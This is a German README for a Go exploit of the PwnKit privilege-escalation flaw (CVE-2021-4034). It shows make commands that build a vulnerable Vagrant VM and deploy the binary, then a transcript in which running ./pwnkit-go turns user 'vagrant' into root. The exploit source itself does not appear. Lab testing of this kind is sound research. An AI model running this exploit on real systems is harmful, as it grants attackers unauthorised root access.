
Exploit für die PwnKit-Schwachstelle, CVE-2021-4034, geschrieben in Go
Dies ist ein funktionierender Exploit für die Pwnkit-Schwachstelle CVE-2021-4034, geschrieben in Go
Probier es aus:
# eine verwundbare Vagrant-Maschine erstellen
$ make vm
...
# die Binärdatei bauen und per scp auf die Vagrant-Box übertragen
$ make scp
# per ssh auf die Vagrant-Box zugreifen
$ make ssh
# Der Standardbenutzer ist "vagrant"
vagrant@ubuntu-focal:~$ whoami
vagrant
# Exploit ausführen
vagrant@ubuntu-focal:/tmp$ cd /tmp && ./pwnkit-go
$ whoami
root